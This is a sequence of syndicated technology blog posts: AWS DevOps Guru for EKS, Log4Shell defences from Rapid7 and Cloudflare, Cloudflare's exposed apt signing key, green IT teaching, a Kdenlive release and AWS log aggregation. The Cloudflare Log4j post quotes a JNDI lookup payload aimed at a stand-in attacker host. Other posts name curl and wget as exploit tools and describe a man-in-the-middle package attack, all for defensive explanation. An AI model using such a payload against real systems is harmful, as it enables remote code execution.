The Amazon DevOps Guru analysis coverage allowing the user to select all resources in a region or to choose later. In addition the image shows the dialog that requests the user specify an Amazon SNS topic for notification when insights occur.

On the Manage DevOps Guru analysis coverage page, select Analyze all AWS resources in the specified CloudFormation stacks in this Region. Then, select the cluster and managed node group AWS CloudFormation stacks so that DevOps Guru can monitor Amazon EKS.

A dialog where the user is able to specify the AWS CloudFormation stacks in a region for analysis coverage. Two stacks are select including the eks cluster and eks cluster managed node group.

Once this is selected, the display will update indicating that two CloudFormation stacks were added.

Amazon DevOps Guru Settings including DevOps Guru analysis coverage and Amazon SNS notifications.

Amazon DevOps Guru will then start analyzing those two stacks. It takes several hours to collect data and identify normal operating conditions. Once this process is complete, the dashboard will show that those resources have been analyzed, as shown in the following figure.

The completed analysis by DevOps guru of the two AWS Cloudformation stacks indicating a healthy status for both.

Enable Encryption on Amazon SNS Topic

The Amazon SNS Topic created by Amazon DevOps Guru will not enable encryption by default. It is important to enable this feature to encrypt notifications at rest. Go to Amazon SNS, select the topic that is created and then Edit topic. Open the Encryption dialog box and enable encryption as shown in the following figure, specifying an alias, or accepting the default.

The Encryption dialog for Amazon SNS topic when it is Edited.

Deploy Sample Application on Amazon EKS To Trigger Insights

You will use a sample application that is part of the AWS Distro for OpenTelemetry Collector to simulate failure. Using the following manifest, you will deploy a sample application that has pod resource limits for memory and CPU shares. These limits are artificially low and insufficient for the pod to run. The pod will exceed its memory limit and be identified for eviction by Amazon EKS. When it is evicted, the Deployment will attempt to redeploy it to satisfy the requirement for one replica. In turn, this repeats the process and generates memory and pod restart errors in Amazon CloudWatch. For this example, the deployment was left running for over an hour, causing the pod failure to repeat numerous times. The following is the manifest that you will create on the filesystem.

kind: Deployment
apiVersion: apps/v1
metadata:
  name: java-sample-app
  namespace: aws-otel-eks
  labels:
    name: java-sample-app
spec:
  replicas: 1
  selector:
    matchLabels:
      name: java-sample-app
  template:
    metadata:
      labels:
        name: java-sample-app
    spec:
      containers:
        - name: aws-otel-emitter
          image: aottestbed/aws-otel-collector-java-sample-app:0.9.0
          resources:
            limits:
              memory: "128Mi"
              cpu: "200m"
          ports:
          - containerPort: 4567
          env:
          - name: OTEL_OTLP_ENDPOINT
            value: "localhost:4317"
          - name: OTEL_RESOURCE_ATTRIBUTES
            value: "service.namespace=AWSObservability,service.name=CloudWatchEKSService"
          - name: S3_REGION
            value: "us-east-1"
          imagePullPolicy: Always

To deploy the application, use the following command:

$ kubectl apply -f <manifest file name>
deployment.apps/java-sample-app created

Scenario: Improved context from DevOps Guru Container Cluster Grouping and Increased Metrics

For our scenario, Amazon DevOps Guru is monitoring additional Amazon CloudWatch Container Insights metrics for EKS. The following figure shows the flow of information and the eventual notification of the operator, so that they can examine the Amazon DevOps Guru insight. Starting at step 1, the container agent (AWS Distro for OpenTelemetry) forwards container metrics to Amazon CloudWatch. In step 2, Amazon DevOps Guru continually consumes those metrics and performs anomaly detection. If an anomaly is detected, it generates an insight, which triggers an Amazon SNS notification as shown in step 3. In step 4, the operators access the Amazon DevOps Guru console to examine the insight. Then, the operators can leverage the new user interface capability displaying which cluster, namespace, and pod/service is impacted, along with the correlated Amazon EKS metric(s).


New EKS Container Metrics in DevOps Guru

As part of the release, the following pod and node metrics are now tracked by DevOps Guru:

  • pod_number_of_container_restarts – number of times that a pod is restarted (e.g., image pull issues, container failure).
  • pod_memory_utilization_over_pod_limit – memory that exceeds the pod limit called out in resource memory limits.
  • pod_cpu_utilization_over_pod_limit – CPU shares that exceed the pod limit called out in resource CPU limits.
  • pod_cpu_utilization – percent CPU Utilization within an active pod.
  • pod_memory_utilization – percent memory utilization within an active pod.
  • node_network_total_bytes – total bytes over the network interface for the managed node (e.g., EC2 instance)
  • node_filesystem_utilization – percent file system utilization for the managed node (e.g., EC2 instance).
  • node_cpu_utilization – percent CPU Utilization within a managed node (e.g., EC2 instance).
  • node_memory_utilization – percent memory utilization within a managed node (e.g., EC2 instance).

Operator Scenario

The Kubernetes operator is informed of an insight via Amazon SNS. The Amazon SNS message content appears in the following code, showing the originator and information identifying the InsightDescription, InsightSeverity, the name of the container metric, and the pod and EKS cluster:

{
  "AccountId": "XXXXXXX",
  "Region": "<REGION>",
  "MessageType": "NEW_INSIGHT",
  "InsightId": "ADFl69Pwq1Aa6M373DhU0zkAAAAAAAAABuZzSBHxeiNexxnLYD7Lhb0vuwY9hLtz",
  "InsightUrl": "https://<REGION>.console.aws.amazon.com/devops-guru/#/insight/reactive/ADFl69Pwq1Aa6M373DhU0zkAAAAAAAAABuZzSBHxeiNexxnLYD7Lhb0vuwY9hLtz",
  "InsightType": "REACTIVE",
  "InsightDescription": "ContainerInsights pod_number_of_container_restarts Anomalous In Stack eksctl-devopsguru-eks-cluster-cluster",
  "InsightSeverity": "high",
  "StartTime": 1636147920000,
  "Anomalies": [
    {
      "Id": "ALAGy5sIITl9e6i66eo6rKQAAAF88gInwEVT2WRSTV5wSTP8KWDzeCYALulFupOQ",
      "StartTime": 1636147800000,
      "SourceDetails": [
        {
          "DataSource": "CW_METRICS",
          "DataIdentifiers": {
            "name": "pod_number_of_container_restarts",
            "namespace": "ContainerInsights",
            "period": "60",
            "stat": "Average",
            "unit": "None",
            "dimensions": "{\"PodName\":\"java-sample-app\",\"ClusterName\":\"devopsguru-eks-cluster\",\"Namespace\":\"aws-otel-eks\"}"
          }
          ....
  "awsInsightSource": "aws.devopsguru"
}
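
One way to act on these notifications programmatically is to subscribe a Lambda function to the topic and parse the JSON payload shown above. A minimal handler sketch, with the routing logic left as a comment:

import com.amazonaws.services.lambda.runtime.Context;
import com.amazonaws.services.lambda.runtime.RequestHandler;
import com.amazonaws.services.lambda.runtime.events.SNSEvent;

public class InsightNotificationHandler implements RequestHandler<SNSEvent, Void> {
    @Override
    public Void handleRequest(SNSEvent event, Context context) {
        for (SNSEvent.SNSRecord record : event.getRecords()) {
            // The DevOps Guru payload shown above arrives as the SNS message body (JSON).
            String message = record.getSNS().getMessage();
            // A real handler would parse the JSON and route on MessageType / InsightSeverity,
            // for example paging the on-call operator for "high" severity reactive insights.
            context.getLogger().log("DevOps Guru notification: " + message);
        }
        return null;
    }
}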

The Amazon DevOps Guru console collects the insights under the Insights section, as shown in the following figure. Select Insights to view the details.

Amazon DevOps Guru Insights. An insight is displayed with a status of Ongoing and Severity of High.

The Aggregated Metrics panel identifies the EKS container metrics that have errored; in this case, pod_memory_utilization_over_pod_limit and pod_number_of_container_restarts.

Aggregated Metrics panel with pod_memory_utilization_over_pod_limit and pod_number_of_container_restarts for the Amazon EKS cluster names devopsguru-eks-cluster. Graphically a timeline including time and date is displayed conveying the length of the anomaly.

Further details can be identified by selecting and expanding each insight as shown in the following figure.

Displays the ability to expand the cluster metrics providing further information on the PodName, Namespace and ClusterName. Furthermore, a search bar is provided to search on name, stack or service name.

Note that the display provides information around the Cluster, PodName, and Namespace. This helps operators maintaining large numbers of EKS Clusters to quickly isolate the offending Pod, its operating Namespace, and EKS Cluster to which it belongs. A search bar provides further filtering to isolate the name, stack, or service name displayed.

Cleaning Up

Follow these steps to delete the resources and prevent additional charges from being posted to your account.

Amazon EKS Cluster Cleanup

Follow these steps to detach the customer managed policy and delete the cluster.

  • Detach customer managed policy, AWSDistroOpenTelemetryPolicy, via IAM Console.
  • Delete cluster using eksctl.
$ eksctl delete cluster devopsguru-eks-cluster --region <region>
2021-10-13 14:08:28 [i] eksctl version 0.69.0
2021-10-13 14:08:28 [i] using region <region>
2021-10-13 14:08:28 [i] deleting EKS cluster "devopsguru-eks-cluster"
2021-10-13 14:08:30 [i] will drain 0 unmanaged nodegroup(s) in cluster "devopsguru-eks-cluster"
2021-10-13 14:08:32 [i] deleted 0 Fargate profile(s)
2021-10-13 14:08:33 [✔] kubeconfig has been updated
2021-10-13 14:08:33 [i] cleaning up AWS load balancers created by Kubernetes objects of Kind Service or Ingress
2021-10-13 14:09:02 [i] 2 sequential tasks: { delete nodegroup "managed-ng-private", delete cluster control plane "devopsguru-eks-cluster" [async] }
2021-10-13 14:09:02 [i] will delete stack "eksctl-devopsguru-eks-cluster-nodegroup-managed-ng-private"
2021-10-13 14:09:02 [i] waiting for stack "eksctl-devopsguru-eks-cluster-nodegroup-managed-ng-private" to get deleted
2021-10-13 14:12:30 [i] will delete stack "eksctl-devopsguru-eks-cluster-cluster"
2021-10-13 14:12:30 [✔] all cluster resources were deleted

Conclusion

The previous scenarios demonstrated the new cluster grouping and the additional container metrics. Both of these features further simplify and expand an operator's ability to identify issues within a container cluster when Amazon DevOps Guru detects anomalies. You can start building your own solutions that employ the Amazon CloudWatch Agent / AWS Distro for OpenTelemetry Agent and Amazon DevOps Guru by reading the documentation, which provides a conceptual overview and practical examples to help you understand the features provided by Amazon DevOps Guru and how to use them.

About the authors

Rahul Sharad Gaikwad

Rahul Sharad Gaikwad is a Lead Consultant – DevOps with AWS. He helps customers and partners on their Cloud and DevOps adoption journey. He is passionate about technology and enjoys collaborating with customers. In his spare time, he focuses on his PhD Research work. He also enjoys gymming and spending time with his family.

Leo Da Silva

Leo Da Silva is a Partner Solution Architect Manager at AWS and uses his knowledge to help customers better utilize cloud services and technologies. Over the years, he had the opportunity to work in large, complex environments, designing, architecting, and implementing highly scalable and secure solutions to global companies. He is passionate about football, BBQ, and Jiu Jitsu — the Brazilian version of them all.

Chris Riley

Chris Riley is a Senior Solutions Architect working with Strategic Accounts providing support in Industry segments including Healthcare, Financial Services, Public Sector, Automotive and Manufacturing via Managed AI/ML Services, IoT and Serverless Services.

Security updates for Wednesday

Post Syndicated from original https://lwn.net/Articles/878749/rss

Security updates have been issued by Fedora (libopenmpt), openSUSE (icu.691, log4j, nim, postgresql10, and xorg-x11-server), Red Hat (idm:DL1), SUSE (gettext-runtime, icu.691, runc, storm, storm-kit, and xorg-x11-server), and Ubuntu (xorg-server, xorg-server-hwe-18.04, xwayland).

How to Protect Your Applications Against Log4Shell With tCell

Post Syndicated from Bria Grangard original https://blog.rapid7.com/2021/12/15/how-to-protect-your-applications-against-log4shell-with-tcell/


By now, we’re sure you’re familiar with all things Log4Shell – but we want to make sure we share how to protect your applications. Applications are a critical part of any organization’s attack surface, and we’re seeing thousands of Log4Shell attack attempts in our customers’ environments every hour. Let’s walk through the various ways tCell can help our customers protect against Log4Shell attacks.

1. Monitor for any Log4Shell attack attempts

tCell is a web application and API protection solution with traditional web application firewall capabilities, such as attack monitoring. Over the weekend, we launched a new App Firewall detection for all tCell customers. This means tCell customers can leverage our App Firewall functionality to determine whether any Log4Shell attack attempts have taken place. From there, customers can also drill into more information on the events that took place. We’ve created a video below to walk you through how to detect Log4Shell attack attempts using the App Firewall feature in tCell.




As a reminder, customers will need to make sure they have deployed the JVM agent on their apps to begin monitoring their applications’ activity. Make sure to check out our Quick Start Guide if you need help setting up tCell.

2. Block against Log4Shell attacks

Monitoring is great, but what you may be looking for is something that protects your application by blocking Log4Shell attack attempts. In order to do this, we’ve added a default pattern (tc-cmdi-4) for customers to block against. Below is a video on how to set up this custom block rule, or reach out to the tCell team if you need any assistance rolling this out at large.




As research continues and new patterns are identified, we will provide updates to tc-cmdi-4 to improve coverage. Customers have already noted that the new default pattern provides more protection coverage than it did yesterday.

3. Identify vulnerable packages (such as those affected by CVE-2021-44228)

We’ve heard from customers that they’re unsure whether their applications are using the vulnerable package. With tCell, we will alert you if any vulnerable packages (such as those affected by CVE-2021-44228 and CVE-2021-45046) are loaded by the application at runtime. The best way to eliminate the risk exposure for Log4Shell is to upgrade any vulnerable packages to version 2.16. Check out the video below for more information.




If you would like to provide additional checks outside of the vulnerable packages check at runtime, please refer to our blog on how InsightVM can help you do this.

4. Enable OS command blocking

One of the benefits of using tCell’s app server agents is the fact that you can enable blocking for OS commands. This will prevent a wide range of exploits leveraging things like curl, wget, etc. Below you’ll find a picture of how to enable OS commands (either report only or block and report).


5. Detect and block suspicious actors

All events that are detected by the App Firewall in tCell are fed into the analytics engine to determine Suspicious Actors. The Suspicious Actors feature takes in multiple inputs (such as failed logins, injections, unusual inputs, etc.) and correlates these to an IP address.


Not only can you monitor for suspicious actors with tCell, but you can also configure tCell to block all activity or just the suspicious activity from the malicious actor’s IP.


All the components together make the magic happen

The power of tCell isn’t in one or two features, but rather in its robust capability set, which we believe is required to secure any environment with a defense-in-depth approach. We will help customers not only identify vulnerable Log4j packages that are being used, but also monitor for suspicious activity and block attacks. The best security comes from having multiple types of defenses available to protect against bad actors, and this is why using the capabilities mentioned here will prove valuable in protecting against Log4Shell and future threats.

Get more critical insights about defending against Log4Shell

Check out our resource center

Protection against CVE-2021-45046, the additional Log4j RCE vulnerability

Post Syndicated from Gabriel Gabor original https://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/


Hot on the heels of CVE-2021-44228, a second Log4J CVE has been filed: CVE-2021-45046. The rules that we previously released for CVE-2021-44228 give the same level of protection for this new CVE.

This vulnerability is actively being exploited and anyone using Log4J should update to version 2.16.0 as soon as possible, even if you have previously updated to 2.15.0. The latest version can be found on the Log4J download page.

Customers using the Cloudflare WAF have three rules to help mitigate any exploit attempts:

Rule ID | Description | Default Action
100514 (legacy WAF) / 6b1cc72dff9746469d4695a474430f12 (new WAF) | Log4J Headers | BLOCK
100515 (legacy WAF) / 0c054d4e4dd5455c9ff8f01efe5abb10 (new WAF) | Log4J Body | BLOCK
100516 (legacy WAF) / 5f6744fa026a4638bda5b3d7d5e015dd (new WAF) | Log4J URL | BLOCK

The mitigation has been split across three rules inspecting HTTP headers, body and URL respectively.

In addition to the above rules we have also released a fourth rule that will protect against a much wider range of attacks at the cost of a higher false positive rate. For that reason we have made it available but not set it to BLOCK by default:

Rule ID | Description | Default Action
100517 (legacy WAF) / 2c5413e155db4365befe0df160ba67d7 (new WAF) | Log4J Advanced URI, Headers | DISABLED

Who is affected

Log4J is a powerful Java-based logging library maintained by the Apache Software Foundation.

In all Log4J versions >= 2.0-beta9 and <= 2.14.1, JNDI features used in configuration, log messages, and parameters can be exploited by an attacker to perform remote code execution. Specifically, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
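
To make that concrete, the vulnerable pattern is simply logging attacker-influenced input with an affected log4j-core version, as in the following illustrative snippet:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoginAudit {
    private static final Logger logger = LogManager.getLogger(LoginAudit.class);

    public void recordFailedLogin(String userSuppliedName) {
        // On log4j-core 2.0-beta9 through 2.14.1, a value such as
        // "${jndi:ldap://attacker.example/a}" here triggers a JNDI lookup and
        // remote class loading; 2.16.0 disables message lookups entirely.
        logger.warn("Failed login attempt for user {}", userSuppliedName);
    }
}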

In addition, the previous mitigations for CVE-2021-44228 as seen in version 2.15.0 were not adequate to protect against CVE-2021-45046.

An exposed apt signing key and how to improve apt security

Post Syndicated from Jeff Hiner original https://blog.cloudflare.com/dont-use-apt-key/


Recently, we received a bug bounty report regarding the GPG signing key used for pkg.cloudflareclient.com, the Linux package repository for our Cloudflare WARP products. The report stated that this private key had been exposed. We’ve since rotated this key and we are taking steps to ensure a similar problem can’t happen again. Before you read on, if you are a Linux user of Cloudflare WARP, please follow these instructions to rotate the Cloudflare GPG Public Key trusted by your package manager. This only affects WARP users who have installed WARP on Linux. It does not affect Cloudflare customers of any of our other products or WARP users on mobile devices.

But we also realized that the impact of an improperly secured private key can have consequences that extend beyond the scope of one third-party repository. The remainder of this blog shows how to improve the security of apt with third-party repositories.

The unexpected impact

At first, we thought that the exposed signing key could only be used by an attacker to forge packages distributed through our package repository. However, when reviewing impact for Debian and Ubuntu platforms we found that our instructions were outdated and insecure. In fact, we found the majority of Debian package repositories on the Internet were providing the same poor guidance: download the GPG key from a website and then either pipe it directly into apt-key or copy it into /etc/apt/trusted.gpg.d/. This method adds the key as a trusted root for software installation from any source. To see why this is a problem, we have to understand how apt downloads and verifies software packages.

How apt verifies packages

In the early days of Linux, package maintainers wanted to make sure users could trust that the software being installed on their machines came from a trusted source.

Apt has a list of places to pull packages from (sources) and a method to validate those sources (trusted public keys). Historically, the keys were stored in a single keyring file: /etc/apt/trusted.gpg. Later, as third party repositories became more common, apt could also look inside /etc/apt/trusted.gpg.d/ for individual key files.

What happens when you run apt update? First, apt fetches a signed file called InRelease from each source. Some servers supply separate Release and signature files instead, but they serve the same purpose. InRelease is a file containing metadata that can be used to cryptographically validate every package in the repository. Critically, it is also signed by the repository owner’s private key. As part of the update process, apt verifies that the InRelease file has a valid signature, and that the signature was generated by a trusted root. If everything checks out, a local package cache is updated with the repository’s contents. This cache is directly used when installing packages. The chain of signed InRelease files and cryptographic hashes ensures that each downloaded package hasn’t been corrupted or tampered with along the way.

An exposed apt signing key and how to improve apt security

A typical third-party repository today

For most Ubuntu/Debian users today, this is what adding a third-party repository looks like in practice:

  1. Add a file in /etc/apt/sources.list.d/ telling apt where to look for packages.
  2. Add the gpg public key to /etc/apt/trusted.gpg.d/, probably via apt-key.

If apt-key is used in the second step, the command typically pops up a deprecation warning, telling you not to use apt-key. There’s a good reason: adding a key like this trusts it for any repository, not just the source from step one. This means if the private key associated with this new source is compromised, attackers can use it to bypass apt’s signature verification and install their own packages.

What would this type of attack look like? Assume you’ve got a stock Debian setup with a default sources list [1]:

deb http://deb.debian.org/debian/ bullseye main non-free contrib
deb http://security.debian.org/debian-security bullseye-security main contrib non-free

At some point you installed a trusted key that was later exposed, and the attacker has the private key. This key was added alongside a source pointing at https, assuming that even if the key is broken an attacker would have to break TLS encryption as well to install software via that route.

You’re enjoying a hot drink at your local cafe, where someone nefarious has managed to hack the router without your knowledge. They’re able to intercept http traffic and modify it. An auto-update script on your laptop runs apt update. The attacker pretends to be deb.debian.org, and because at least one source is configured to use http, the attacker doesn’t need to break https. They return a modified InRelease file signed with the compromised key, indicating that a newer update of the bash package is available. apt pulls the new package (again from the attacker) and installs it, as root. Now you’ve got a big problem [2].

A better way

It seems the way most folks are told to set up third-party Debian repositories is wrong. What if you could tell apt to only trust that GPG key for a specific source? That, combined with the use of https, would significantly reduce the impact of a key compromise. As it turns out, there’s a way to do that! You’ll need to do two things:

  1. Make sure the key isn’t in /etc/apt/trusted.gpg or /etc/apt/trusted.gpg.d/ anymore. If the key is its own file, the easiest way to do this is to move it to /usr/share/keyrings/. Make sure the file is owned by root, and only root can write to it. This step is important, because it prevents apt from using this key to check all repositories in the sources list.
  2. Modify the sources file in /etc/apt/sources.list.d/ telling apt that this particular repository can be “signed by” a specific key. When you’re done, the line should look like this:

deb [signed-by=/usr/share/keyrings/cloudflare-client.gpg] https://pkg.cloudflareclient.com/ bullseye main

Some source lists contain other metadata indicating that the source is only valid for certain architectures. If that’s the case, just add a space in the middle, like so:

deb [amd64 signed-by=/usr/share/keyrings/cloudflare-client.gpg] https://pkg.cloudflareclient.com/ bullseye main

We’ve updated the instructions on our own repositories for the WARP Client and Cloudflare with this information, and we hope others will follow suit.

If you run apt-key list on your own machine, you’ll probably find several keys that are trusted far more than they should be. Now you know how to fix them!

For those running your own repository, now is a great time to review your installation instructions. If your instructions tell users to curl a public key file and pipe it straight into sudo apt-key, maybe there’s a safer way. While you’re in there, ensuring the package repository supports https is a great way to add an extra layer of security (and if you host your traffic via Cloudflare, it’s easy to set up, and free. You can follow this blog post to learn how to properly configure Cloudflare to cache Debian packages).


[1] RPM-based distros like Fedora, CentOS, and RHEL also use a common trusted GPG store to validate packages, but since they generally use https by default to fetch updates they aren’t vulnerable to this particular attack.
[2] The attack described above requires an active on-path network attacker. If you are using the WARP client or Cloudflare for Teams to tunnel your traffic to Cloudflare, your network traffic cannot be tampered with on local networks.

Green information technology and classroom discussions

Post Syndicated from Gemma Coleman original https://www.raspberrypi.org/blog/green-information-technology-climate-change-data-centre-e-waste-hello-world/

The global IT industry generates as much CO2 as the aviation industry. In Hello World issue 17, we learn about the hidden impact of our IT use and the changes we can make from Beverly Clarke, national community manager for Computing at School and author of Computer Science Teacher: Insight Into the Computing Classroom.

With the onset of the pandemic, the world seemed to shut down. Flights were grounded, fewer people were commuting, and companies and individuals increased their use of technology for work and communication. On the surface, this seemed like a positive time for the environment. However, I soon found myself wondering about the impact that this increased use of technology would have on our planet, in particular the increases in energy consumption and e-waste. This is a major social, moral, and ethical issue that is hiding in plain sight — green IT is big news.


Energy and data centres

Thinking that online is always better for the planet is not always as straightforward as it seems. If we choose to meet via conference call rather than travelling to a meeting, there are hidden environmental impacts to consider. If there are 50 people on a call from across the globe, all of the data generated is being routed around the world through data centres, and a lot of energy is being used. If all of those people are also using video, that is even more energy than audio only.

Stacks of server hardware behind metal fencing in a data centre.
Data centres consume a lot of energy — and how is that energy generated?

Not only is the amount of energy being used a concern, but we must also ask ourselves how these data centres are being powered. Is the energy they are using coming from a renewable source? If not, we may be replacing one environmental problem with another.

What about other areas of our lives, such as taking photos or filming videos? These two activities have probably increased as we have been separated from family and friends. They use energy, especially when the image or video is then shared with others around the world and consequently routed through data centres. A large amount of energy is being used, and more is used the further the image travels.


Similarly, consider social media and the number of posts individuals and companies make on a daily basis. All of these are travelling through data centres and using energy, yet for the most part this is not visible to the user.

E-waste

E-waste is another green IT issue, and one that will only get worse as we rely on electronic devices more. As well as the potential eyesore of mountains of e-waste, there is also the impact upon the planet of mining the metals used in these electronics, such as gold, copper, aluminium, and steel.

A hand holding two smartphones.
In their marketing, device manufacturers and mobile network carriers make us see the phones we currently own in a negative light so that we feel the need to upgrade to the newest model.

The processes used to mine these metals lead to pollution, and we should also consider that some of the precious metals used in our devices could run out, as there is not an endless supply in the Earth’s surface.


It is also problematic that a lot of e-waste is sent to developing countries with limited recycling plants, and so much of the e-waste ends up in landfill. This can lead to toxic substances being leaked into the Earth’s surface.

First steps towards action

With my reflective hat on, I started to think about discussions we as teachers could have with pupils around this topic, and came up with the following:

  • Help learners to talk about the cloud and where it is located. We can remind them that the cloud is a physical entity. Show them images of data centres to help make this real, and allow them to appreciate where the data we generate every day goes.
  • Ask learners how many photos and videos they have on their devices, and where they think those items are stored. This can be extended to a year group or whole-school exercise so they can really appreciate the sheer amount of data being used and sent across the cloud, and how data centres fit with that energy consumption. I did this activity and found that I had 7163 photos and 304 videos on my phone — that’s using a lot of energy!
A classroom of students in North America.
Helping young people gain an understanding of the impact of our use of electronic devices is an important action you can take.
  • Ask learners to research any local data centres and find out how many data centres there are in the world. You could then develop this into a discussion, including language related to data centres such as sensors, storage devices, cabling, and infrastructure. This helps learners to connect the theory to real-world examples.
  • Ask learners to reflect upon how many devices they use that are connected to the Internet of Things.
  • Consider for ourselves and ask parents, family, and friends how our online usage has changed since before the pandemic.
  • Consider what happens to electronic devices when they are thrown away and become e-waste. Where does it all go? What is the effect of e-waste on communities and countries?

Tips for greener IT

UK-based educators can watch a recent episode of TV programme Dispatches that investigates the carbon footprint of the IT industry. You can add the following tips from the programme to your discussions:

  • Turn off electronic devices when not in use
  • Use audio only when on online calls
  • Dispose of your old devices responsibly
  • Look at company websites and see what their commitment is to green IT, and consider whether we should support companies whose commitment to the planet is poor
  • Use WiFi instead of 3G/4G/5G, as it uses less energy

These lists are not exhaustive, but provide a good starting point for discussions with learners. We should all play our small part in ensuring that we #RestoreOurEarth — this year’s Earth Day theme — and having an awareness and understanding of the impact of our use of electronic devices is part of the way forward.

Some resources on green IT — do you have others?

What about you? In the comments below, share your thoughts, tips, and resources on green IT and how we can bring awareness of it to our learners and young people at home.

The post Green information technology and classroom discussions appeared first on Raspberry Pi.

Kdenlive 21.12 released

Post Syndicated from original https://lwn.net/Articles/878696/rss

Version 21.12 of the Kdenlive video editor is out.

The last and most exciting release of Kdenlive this year is out and
brings long awaited features like Multicam Editing and Slip
trimming mode, all of which drastically improve your editing
workflow. This version also comes with a new deep-learning based
tracking algorithm, an auto-magical noise reduction filter and
support for multiple Project Bins.

Unify log aggregation and analytics across compute platforms

Post Syndicated from Hari Ohm Prasath original https://aws.amazon.com/blogs/big-data/unify-log-aggregation-and-analytics-across-compute-platforms/

Our customers want to make sure their users have the best experience running their application on AWS. To make this happen, you need to monitor and fix software problems as quickly as possible. Doing this gets challenging as the volume of data that needs to be quickly detected, analyzed, and stored keeps growing. In this post, we walk you through an automated process to aggregate and monitor application log data in near-real time, so you can remediate application issues faster.

This post shows how to unify and centralize logs across different computing platforms. With this solution, you can unify logs from Amazon Elastic Compute Cloud (Amazon EC2), Amazon Elastic Container Service (Amazon ECS), Amazon Elastic Kubernetes Service (Amazon EKS), Amazon Kinesis Data Firehose, and AWS Lambda using agents, log routers, and extensions. We use Amazon OpenSearch Service (successor to Amazon Elasticsearch Service) with OpenSearch Dashboards to visualize and analyze the logs, collected across different computing platforms to get application insights. You can deploy the solution using the AWS Cloud Development Kit (AWS CDK) scripts provided as part of the solution.

Customer benefits

A unified aggregated log system provides the following benefits:

  • A single point of access to all the logs across different computing platforms
  • A standard place to define and apply transformations of logs before they get delivered to downstream systems like Amazon Simple Storage Service (Amazon S3), Amazon OpenSearch Service, Amazon Redshift, and other services
  • The ability to use Amazon OpenSearch Service to quickly index logs, and OpenSearch Dashboards to search and visualize them across routers, applications, and other devices

Solution overview

In this post, we use the following services to demonstrate log aggregation across different compute platforms:

  • Amazon EC2 – A web service that provides secure, resizable compute capacity in the cloud. It’s designed to make web-scale cloud computing easier for developers.
  • Amazon ECS – A web service that makes it easy to run, scale, and manage Docker containers on AWS, designed to make the Docker experience easier for developers.
  • Amazon EKS – A managed Kubernetes service that makes it easy to run, scale, and manage containerized applications on AWS without operating your own Kubernetes control plane.
  • Kinesis Data Firehose – A fully managed service that makes it easy to stream data to Amazon S3, Amazon Redshift, or Amazon OpenSearch Service.
  • Lambda – A compute service that lets you run code without provisioning or managing servers. It runs your code only when needed and scales automatically.
  • Amazon OpenSearch Service – A fully managed service that makes it easy for you to perform interactive log analytics, real-time application monitoring, website search, and more.

The following diagram shows the architecture of our solution.

The architecture uses various log aggregation tools such as log agents, log routers, and Lambda extensions to collect logs from multiple compute platforms and deliver them to Kinesis Data Firehose. Kinesis Data Firehose streams the logs to Amazon OpenSearch Service. Log records that fail to be persisted in Amazon OpenSearch Service are written to Amazon S3. To scale this architecture, each of these compute platforms streams its logs to a different Firehose delivery stream, which is added as a separate index and rotated every 24 hours.

The following sections demonstrate how the solution is implemented on each of these computing platforms.

Amazon EC2

The Kinesis agent collects and streams logs from the applications running on EC2 instances to Kinesis Data Firehose. The agent is a standalone Java software application that offers an easy way to collect and send data to Kinesis Data Firehose. The agent continuously monitors files and sends logs to the Firehose delivery stream.

BDB-1742-Ec2

The AWS CDK script provided as part of this solution deploys a simple PHP application that generates logs under the /etc/httpd/logs directory on the EC2 instance. The Kinesis agent is configured via /etc/aws-kinesis/agent.json to collect data from access_logs and error_logs, and stream them periodically to Kinesis Data Firehose (ec2-logs-delivery-stream).
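For reference, an agent.json along these lines would express that configuration; the exact file written by the CDK script may differ, and the endpoint shown assumes the us-east-1 Region:

{
  "firehose.endpoint": "firehose.us-east-1.amazonaws.com",
  "flows": [
    {
      "filePattern": "/etc/httpd/logs/access_log*",
      "deliveryStream": "ec2-logs-delivery-stream"
    },
    {
      "filePattern": "/etc/httpd/logs/error_log*",
      "deliveryStream": "ec2-logs-delivery-stream"
    }
  ]
}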

Because Amazon OpenSearch Service expects data in JSON format, you can add a call to a Lambda function to transform the log data to JSON format within Kinesis Data Firehose before streaming to Amazon OpenSearch Service. The following is a sample input for the data transformer:

46.99.153.40 - - [29/Jul/2021:15:32:33 +0000] "GET / HTTP/1.1" 200 173 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

The following is our output:

{
    "logs" : "46.99.153.40 - - [29/Jul/2021:15:32:33 +0000] \"GET / HTTP/1.1\" 200 173 \"-\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36\"",
}

We can enhance the Lambda function to extract the timestamp, HTTP, and browser information from the log data, and store them as separate attributes in the JSON document.
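As a sketch of that enhancement, a Firehose transformation function along the following lines could parse each Apache access log line and emit the enriched JSON document. The regular expression and field names are illustrative and simplified, not the exact function deployed by the CDK script:

import base64
import json
import re

# Simplified pattern for the Apache combined log format (illustrative only)
LOG_PATTERN = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<timestamp>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)

def handler(event, context):
    output = []
    for record in event['records']:
        raw = base64.b64decode(record['data']).decode('utf-8')
        doc = {'logs': raw.rstrip('\n')}
        match = LOG_PATTERN.match(raw)
        if match:
            # Store selected fields as separate attributes in the JSON document
            doc.update({
                'timestamp': match.group('timestamp'),
                'request': match.group('request'),
                'status': match.group('status'),
                'agent': match.group('agent'),
            })
        output.append({
            'recordId': record['recordId'],
            'result': 'Ok',
            'data': base64.b64encode((json.dumps(doc) + '\n').encode('utf-8')).decode('utf-8'),
        })
    return {'records': output}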

Amazon ECS

In the case of Amazon ECS, we use FireLens to send logs directly to Kinesis Data Firehose. FireLens is a container log router for Amazon ECS and AWS Fargate that gives you the extensibility to use the breadth of services at AWS or partner solutions for log analytics and storage.

BDB-1742-ECS

The architecture hosts FireLens as a sidecar, which collects logs from the main container running an httpd application and sends them to Kinesis Data Firehose and streams to Amazon OpenSearch Service. The AWS CDK script provided as part of this solution deploys a httpd container hosted behind an Application Load Balancer. The httpd logs are pushed to Kinesis Data Firehose (ecs-logs-delivery-stream) through the FireLens log router.
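The container definitions are generated by the CDK script, but conceptually the relevant fragment of the task definition looks something like the following sketch; the image tags and Region are placeholders, and the Fluent Bit firehose output is configured through the awsfirelens log driver options:

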